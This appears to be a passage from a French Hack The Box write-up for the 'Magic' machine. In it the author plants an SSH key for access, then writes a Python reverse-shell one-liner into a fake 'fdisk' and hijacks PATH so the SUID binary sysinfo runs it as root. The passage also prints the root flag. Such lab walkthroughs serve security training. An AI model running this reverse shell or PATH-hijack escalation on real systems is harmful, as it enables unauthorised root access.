ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001
root@Host-001:~/Bureau/htb/magic#
theseus@ubuntu:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001" >> authorized_keys
<yxpzU18xC+Qix7qE= root@Host-001" >> authorized_keys
theseus@ubuntu:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxppRSGxoVEp4uvGSgicxrNS7CVyJ/GtdliKecBEsCcY6YN0QbhMx1+kKoiNHWlKWFgcCkg7SL81Yj7wcvXzjz9Jf05bdarDqqnrgn2yVZMftEdPi5yL1+URDfRfO9dvaEsIB0JUYNznRXL4nauJeGOyPdnKu5kiQq52QMu6cH8n9T5eKoqJsHBeJb14SJFRpljrGsPsYMPycZOOr3YIo/a3jLyLm7UoyRFFSJ1xtaPeIHLg+x99OZpI512gwCxZiXe7otQrlY1tKk56fnEtCAK3vuhrToc4qwzZHDc5F+jDghBT6d/QH0PU5Lc7vNcWPcbuVteKQvC83SOt/xP+alA2PXm4go9pLaE15/Cidbj4iZz9A0j2wjpEmJyESjYWRVaSL52T1FzmRpJ8kHYFYbeMy7U899Uft2zWashoP2NcsjNzlLTvmtx7AtTZH/mXj5aG/r4XvV54gtag0VawsYszvQTF3Hid6upLE4OLzmVOvk0tXmFkKkJbnW/tteNrs= root@kali
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC69tl7R/xbvIsvhiU2Rx4DmtN2qJTfBlRZAWmqNRB+VGEfVh4CVmHkOrVifXPQQVqxWEhc9OtFe3iDTPtDzuIRf6/IR2j9P11Om90I+DIuSnunwBM0eVVf0Ygwq6aWyi5+1uciW0oonsd6KeEwPiUCRNOnLfF9fcSvSksrvaHQHYxft9BhTIIm/4a4hmMB2uPeJ8UuV3Irm4UfSa8R9Z+e2DbvhHE7lgYdsoHs/pGog4DhQif0UV/cWsygjAhSsME87rp7ovmTlqfOgOdG9nXPwHgbBujA+0LnZAwAzvZdb6+GTpMkKeyCeN5Megx8/0uejHtqSFyz+UfPyD96/J0J5SropAhHUjmEgcbozxzTtBcb2kg6oYAskLnmmBhYvIj1NglOFBXFG8H/kxwW4rQMn+eeKoy9d0ZM7qCqkDjW8w//UA86aha0LVq1HfGnu+L5/eBa9CN309l2HyAHVuRFqvVc3DNQDCX0ER0S8eTPSMI1jjqyxpzU18xC+Qix7qE= root@Host-001
theseus@ubuntu:~/.ssh$
root@Host-001:~/Bureau/htb/magic# ssh -i id_rsa theseus@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
29 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Aug 1 09:26:54 2020 from 10.10.14.141
theseus@ubuntu:~$ ls
cat Documents fdisk Pictures Templates Videos
Desktop Downloads Music Public user.txt
theseus@ubuntu:~$
On crée un shell executé par sysinfo + listener port 1234
theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo
====================Hardware Info====================
H/W path Device Class Description
=====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7401P 24-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/1/2 memory 512KiB L2 cache
/0/1/3 memory 512KiB L2 cache
/0/2 processor AMD EPYC 7401P 24-Core Processor
/0/28 memory System Memory
/0/28/0 memory 4GiB DIMM DRAM EDO
/0/28/1 memory DIMM DRAM [empty]
/0/28/2 memory DIMM DRAM [empty]
/0/28/3 memory DIMM DRAM [empty]
/0/28/4 memory DIMM DRAM [empty]
/0/28/5 memory DIMM DRAM [empty]
/0/28/6 memory DIMM DRAM [empty]
/0/28/7 memory DIMM DRAM [empty]
/0/28/8 memory DIMM DRAM [empty]
/0/28/9 memory DIMM DRAM [empty]
/0/28/a memory DIMM DRAM [empty]
/0/28/b memory DIMM DRAM [empty]
/0/28/c memory DIMM DRAM [empty]
/0/28/d memory DIMM DRAM [empty]
/0/28/e memory DIMM DRAM [empty]
/0/28/f memory DIMM DRAM [empty]
/0/28/10 memory DIMM DRAM [empty]
/0/28/11 memory DIMM DRAM [empty]
/0/28/12 memory DIMM DRAM [empty]
/0/28/13 memory DIMM DRAM [empty]
/0/28/14 memory DIMM DRAM [empty]
/0/28/15 memory DIMM DRAM [empty]
/0/28/16 memory DIMM DRAM [empty]
/0/28/17 memory DIMM DRAM [empty]
/0/28/18 memory DIMM DRAM [empty]
/0/28/19 memory DIMM DRAM [empty]
/0/28/1a memory DIMM DRAM [empty]
/0/28/1b memory DIMM DRAM [empty]
/0/28/1c memory DIMM DRAM [empty]
/0/28/1d memory DIMM DRAM [empty]
/0/28/1e memory DIMM DRAM [empty]
/0/28/1f memory DIMM DRAM [empty]
/0/28/20 memory DIMM DRAM [empty]
/0/28/21 memory DIMM DRAM [empty]
/0/28/22 memory DIMM DRAM [empty]
/0/28/23 memory DIMM DRAM [empty]
/0/28/24 memory DIMM DRAM [empty]
/0/28/25 memory DIMM DRAM [empty]
/0/28/26 memory DIMM DRAM [empty]
/0/28/27 memory DIMM DRAM [empty]
/0/28/28 memory DIMM DRAM [empty]
/0/28/29 memory DIMM DRAM [empty]
/0/28/2a memory DIMM DRAM [empty]
/0/28/2b memory DIMM DRAM [empty]
/0/28/2c memory DIMM DRAM [empty]
/0/28/2d memory DIMM DRAM [empty]
/0/28/2e memory DIMM DRAM [empty]
/0/28/2f memory DIMM DRAM [empty]
/0/28/30 memory DIMM DRAM [empty]
/0/28/31 memory DIMM DRAM [empty]
/0/28/32 memory DIMM DRAM [empty]
/0/28/33 memory DIMM DRAM [empty]
/0/28/34 memory DIMM DRAM [empty]
/0/28/35 memory DIMM DRAM [empty]
/0/28/36 memory DIMM DRAM [empty]
/0/28/37 memory DIMM DRAM [empty]
/0/28/38 memory DIMM DRAM [empty]
/0/28/39 memory DIMM DRAM [empty]
/0/28/3a memory DIMM DRAM [empty]
/0/28/3b memory DIMM DRAM [empty]
/0/28/3c memory DIMM DRAM [empty]
/0/28/3d memory DIMM DRAM [empty]
/0/28/3e memory DIMM DRAM [empty]
/0/28/3f memory DIMM DRAM [empty]
/0/3 memory
/0/3/0 memory DIMM [empty]
/0/4 memory
/0/4/0 memory DIMM [empty]
/0/5 memory
/0/5/0 memory DIMM [empty]
/0/6 memory
/0/6/0 memory DIMM [empty]
/0/7 memory
/0/7/0 memory DIMM [empty]
/0/8 memory
/0/8/0 memory DIMM [empty]
/0/9 memory
/0/9/0 memory DIMM [empty]
/0/a memory
/0/a/0 memory DIMM [empty]
/0/b memory
/0/b/0 memory DIMM [empty]
/0/c memory
/0/c/0 memory DIMM [empty]
/0/d memory
/0/d/0 memory DIMM [empty]
/0/e memory
/0/e/0 memory DIMM [empty]
/0/f memory
/0/f/0 memory DIMM [empty]
/0/10 memory
/0/10/0 memory DIMM [empty]
/0/11 memory
/0/11/0 memory DIMM [empty]
/0/12 memory
/0/12/0 memory DIMM [empty]
/0/13 memory
/0/13/0 memory DIMM [empty]
/0/14 memory
/0/14/0 memory DIMM [empty]
/0/15 memory
/0/15/0 memory DIMM [empty]
/0/16 memory
/0/16/0 memory DIMM [empty]
/0/17 memory
/0/17/0 memory DIMM [empty]
/0/18 memory
/0/18/0 memory DIMM [empty]
/0/19 memory
/0/19/0 memory DIMM [empty]
/0/1a memory
/0/1a/0 memory DIMM [empty]
/0/1b memory
/0/1b/0 memory DIMM [empty]
/0/1c memory
/0/1c/0 memory DIMM [empty]
/0/1d memory
/0/1d/0 memory DIMM [empty]
/0/1e memory
/0/1e/0 memory DIMM [empty]
/0/1f memory
/0/1f/0 memory DIMM [empty]
/0/20 memory
/0/20/0 memory DIMM [empty]
/0/21 memory
/0/21/0 memory DIMM [empty]
/0/22 memory
/0/22/0 memory DIMM [empty]
/0/23 memory
/0/23/0 memory DIMM [empty]
/0/24 memory
/0/24/0 memory DIMM [empty]
/0/25 memory
/0/25/0 memory DIMM [empty]
/0/26 memory
/0/26/0 memory DIMM [empty]
/0/27 memory
/0/27/0 memory DIMM [empty]
/0/29 memory
/0/29/0 memory DIMM [empty]
/0/2a memory
/0/2a/0 memory DIMM [empty]
/0/2b memory
/0/2b/0 memory DIMM [empty]
/0/2c memory
/0/2c/0 memory DIMM [empty]
/0/2d memory
/0/2d/0 memory DIMM [empty]
/0/2e memory
/0/2e/0 memory DIMM [empty]
/0/2f memory
/0/2f/0 memory DIMM [empty]
/0/30 memory
/0/30/0 memory DIMM [empty]
/0/31 memory
/0/31/0 memory DIMM [empty]
/0/32 memory
/0/32/0 memory DIMM [empty]
/0/33 memory
/0/33/0 memory DIMM [empty]
/0/34 memory
/0/34/0 memory DIMM [empty]
/0/35 memory
/0/35/0 memory DIMM [empty]
/0/36 memory
/0/36/0 memory DIMM [empty]
/0/37 memory
/0/37/0 memory DIMM [empty]
/0/38 memory
/0/38/0 memory DIMM [empty]
/0/39 memory
/0/39/0 memory DIMM [empty]
/0/3a memory
/0/3a/0 memory DIMM [empty]
/0/3b memory
/0/3b/0 memory DIMM [empty]
/0/3c memory
/0/3c/0 memory DIMM [empty]
/0/3d memory
/0/3d/0 memory DIMM [empty]
/0/3e memory
/0/3e/0 memory DIMM [empty]
/0/3f memory
/0/3f/0 memory DIMM [empty]
/0/40 memory
/0/40/0 memory DIMM [empty]
/0/41 memory
/0/41/0 memory DIMM [empty]
/0/42 memory
/0/42/0 memory DIMM [empty]
/0/43 memory
/0/43/0 memory DIMM [empty]
/0/44 memory
/0/45 memory
/0/100 bridge 440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1 bridge 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7 bridge 82371AB/EB/MB PIIX4 ISA
/0/100/7.1 storage 82371AB/EB/MB PIIX4 IDE
/0/100/7.3 bridge 82371AB/EB/MB PIIX4 ACPI
/0/100/7.7 generic Virtual Machine Communication Interface
/0/100/f display SVGA II Adapter
/0/100/10 scsi2 storage 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0 /dev/sda disk 21GB Virtual disk
/0/100/10/0.0.0/1 /dev/sda1 volume 19GiB EXT4 volume
/0/100/11 bridge PCI bridge
/0/100/11/0 bus USB1.1 UHCI Controller
/0/100/11/0/1 usb2 bus UHCI Host Controller
/0/100/11/0/1/1 input VMware Virtual USB Mouse
/0/100/11/0/1/2 bus VMware Virtual USB Hub
/0/100/11/1 bus USB2 EHCI Controller
/0/100/11/1/1 usb1 bus EHCI Host Controller
/0/100/15 bridge PCI Express Root Port
/0/100/15/0 ens160 network VMXNET3 Ethernet Controller
/0/100/15.1 bridge PCI Express Root Port
/0/100/15.2 bridge PCI Express Root Port
/0/100/15.3 bridge PCI Express Root Port
/0/100/15.4 bridge PCI Express Root Port
/0/100/15.5 bridge PCI Express Root Port
/0/100/15.6 bridge PCI Express Root Port
/0/100/15.7 bridge PCI Express Root Port
/0/100/16 bridge PCI Express Root Port
/0/100/16.1 bridge PCI Express Root Port
/0/100/16.2 bridge PCI Express Root Port
/0/100/16.3 bridge PCI Express Root Port
/0/100/16.4 bridge PCI Express Root Port
/0/100/16.5 bridge PCI Express Root Port
/0/100/16.6 bridge PCI Express Root Port
/0/100/16.7 bridge PCI Express Root Port
/0/100/17 bridge PCI Express Root Port
/0/100/17.1 bridge PCI Express Root Port
/0/100/17.2 bridge PCI Express Root Port
/0/100/17.3 bridge PCI Express Root Port
/0/100/17.4 bridge PCI Express Root Port
/0/100/17.5 bridge PCI Express Root Port
/0/100/17.6 bridge PCI Express Root Port
/0/100/17.7 bridge PCI Express Root Port
/0/100/18 bridge PCI Express Root Port
/0/100/18.1 bridge PCI Express Root Port
/0/100/18.2 bridge PCI Express Root Port
/0/100/18.3 bridge PCI Express Root Port
/0/100/18.4 bridge PCI Express Root Port
/0/100/18.5 bridge PCI Express Root Port
/0/100/18.6 bridge PCI Express Root Port
/0/100/18.7 bridge PCI Express Root Port
/0/46 scsi0 storage
/0/46/0.0.0 /dev/cdrom disk VMware IDE CDR00
/1 system
====================Disk Info====================
====================CPU Info====================
processor : 0
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpu MHz : 1999.999
cache size : 512 KB
physical id : 0
siblings : 1
core id : 0
cpu cores : 1
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 3999.99
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:
processor : 1
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpu MHz : 1999.999
cache size : 512 KB
physical id : 2
siblings : 1
core id : 0
cpu cores : 1
apicid : 2
initial apicid : 2
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips : 3999.99
TLB size : 2560 4K pages
clflush size : 64
cache_alignment : 64
address sizes : 43 bits physical, 48 bits virtual
power management:
====================MEM Usage=====================
total used free shared buff/cache available
Mem: 3.8G 591M 1.8G 4.1M 1.5G 3.0G
Swap: 947M 0B 947M
theseus@ubuntu:/tmp/poc$
root@Host-001:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.185] 38992
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# cat /root/root.txt
1897a41132f21627215fbcd8a217a330
#
Poursuivez avec :
This work is licensed under a Creative Commons Attribution 4.0 International License.